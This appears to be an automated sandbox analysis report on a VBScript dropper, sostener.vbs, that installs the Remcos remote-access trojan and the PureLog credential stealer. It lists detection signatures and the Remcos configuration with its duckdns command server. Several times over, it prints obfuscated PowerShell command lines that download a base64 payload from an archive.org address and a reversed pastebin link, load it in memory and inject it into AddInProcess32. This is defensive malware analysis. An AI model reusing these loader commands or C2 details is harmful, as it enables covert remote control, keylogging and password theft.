
Windows Analysis Report
sostener.vbs

Overview

General Information

Sample name: sostener.vbs
Analysis ID: 1519309
MD5: 3b4164bdb4cf6c49570c95714f8c17a5
SHA1: 13c7abef0333088056a8c11c951c97fcb878ad96
SHA256: fac857a7fa291be79831caef11498e067c036cd66812c7f1244b95b3e78a3ea4
Tags: vbs, user-lontze7

Detection

Remcos, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 4780 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • AddInProcess32.exe (PID: 3200 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
        • AddInProcess32.exe (PID: 1836 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
        • AddInProcess32.exe (PID: 4188 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{
  "Version": "4.9.4 Pro",
  "Host:Port:Password": "newssssssssssssss.duckdns.org:2404:0",
  "Assigned name": "Matrix Fenix*",
  "Connect interval": "1",
  "Install flag": "Disable",
  "Setup HKCU\\Run": "Enable",
  "Setup HKLM\\Run": "Enable",
  "Install path": "Application path",
  "Copy file": "remcos.exe",
  "Startup value": "Disable",
  "Hide file": "Disable",
  "Mutex": "Rmc-XDNGQ0",
  "Keylog flag": "1",
  "Keylog path": "Application path",
  "Keylog file": "registros.dat",
  "Keylog crypt": "Disable",
  "Hide keylog file": "Disable",
  "Screenshot flag": "Disable",
  "Screenshot time": "10",
  "Take Screenshot option": "Disable",
  "Take screenshot title": "",
  "Take screenshot time": "5",
  "Screenshot path": "AppData",
  "Screenshot file": "Capturas de pantalla",
  "Screenshot crypt": "Disable",
  "Mouse option": "Disable",
  "Delete file": "Disable",
  "Audio record time": "5"
}
Source | Rule | Description | Author | Strings
Source: C:\ProgramData\remcos\registros.dat | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
    Source | Rule | Description | Author | Strings
    Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
      Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
        Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
        • 0x6c4a8:$a1: Remcos restarted by watchdog!
        • 0x6ca20:$a3: %02i:%02i:%02i:%03i
        Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown
        • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
        • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x6656c:$str_b2: Executing file:
        • 0x675ec:$str_b3: GetDirectListeningPort
        • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x67118:$str_b7: \update.vbs
        • 0x66594:$str_b9: Downloaded file:
        • 0x66580:$str_b10: Downloading file:
        • 0x66624:$str_b12: Failed to upload file:
        • 0x675b4:$str_b13: StartForward
        • 0x675d4:$str_b14: StopForward
        • 0x67070:$str_b15: fso.DeleteFile "
        • 0x67004:$str_b16: On Error Resume Next
        • 0x670a0:$str_b17: fso.DeleteFolder "
        • 0x66614:$str_b18: Uploaded file:
        • 0x665d4:$str_b19: Unable to delete:
        • 0x67038:$str_b20: while fso.FileExists("
        • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
        Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
        • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
        • 0x6637c:$s1: CoGetObject
        • 0x66390:$s1: CoGetObject
        • 0x663ac:$s1: CoGetObject
        • 0x70338:$s1: CoGetObject
        • 0x6633c:$s2: Elevation:Administrator!new:
        Source | Rule | Description | Author | Strings
        Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
          Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
            Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
            • 0x6c4a8:$a1: Remcos restarted by watchdog!
            • 0x6ca20:$a3: %02i:%02i:%02i:%03i
            Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown
            • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
            • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x6656c:$str_b2: Executing file:
            • 0x675ec:$str_b3: GetDirectListeningPort
            • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x67118:$str_b7: \update.vbs
            • 0x66594:$str_b9: Downloaded file:
            • 0x66580:$str_b10: Downloading file:
            • 0x66624:$str_b12: Failed to upload file:
            • 0x675b4:$str_b13: StartForward
            • 0x675d4:$str_b14: StopForward
            • 0x67070:$str_b15: fso.DeleteFile "
            • 0x67004:$str_b16: On Error Resume Next
            • 0x670a0:$str_b17: fso.DeleteFolder "
            • 0x66614:$str_b18: Uploaded file:
            • 0x665d4:$str_b19: Unable to delete:
            • 0x67038:$str_b20: while fso.FileExists("
            • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
            Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
            • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
            • 0x6637c:$s1: CoGetObject
            • 0x66390:$s1: CoGetObject
            • 0x663ac:$s1: CoGetObject
            • 0x70338:$s1: CoGetObject
            • 0x6633c:$s2: Elevation:Administrator!new:

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". 
((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". 
((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", ProcessId: 4780, ProcessName: wscript.exe
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". 
((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5I
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", ProcessId: 4780, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0